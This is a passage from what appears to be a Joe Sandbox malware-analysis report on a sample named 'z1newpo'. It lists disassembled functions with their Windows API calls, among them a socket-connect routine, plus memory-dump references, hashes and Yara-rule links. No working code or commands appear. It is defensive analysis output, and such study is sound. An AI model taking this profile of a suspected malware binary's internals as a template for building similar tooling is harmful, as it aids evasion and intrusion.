                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 659298297-0
                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                    Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(016A1C20,000000F1,00000000,00000000), ref: 00440E6E
                                                      • Part of subcall function 00440D98: SendMessageW.USER32(016A1C20,000000F1,00000001,00000000), ref: 00440E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$EnableMessageSend$LongShow
                                                    • String ID:
                                                    • API String ID: 142311417-0
                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                    Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                    Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                    • _wcslen.LIBCMT ref: 004458FB
                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 3087257052-0
                                                    • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                    • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                    Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 245547762-0
                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                    Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                    • String ID:
                                                    • API String ID: 2338827641-0
                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                    Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                    Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                    Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 4023252218-0
                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                    Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 1489400265-0
                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                    Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1042038666-0
                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                    Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                    • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                    Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041780F
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __getptd.LIBCMT ref: 00417826
                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                    • __lock.LIBCMT ref: 00417844
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                    Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 2403457894-0
                                                    • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                    • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                    Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
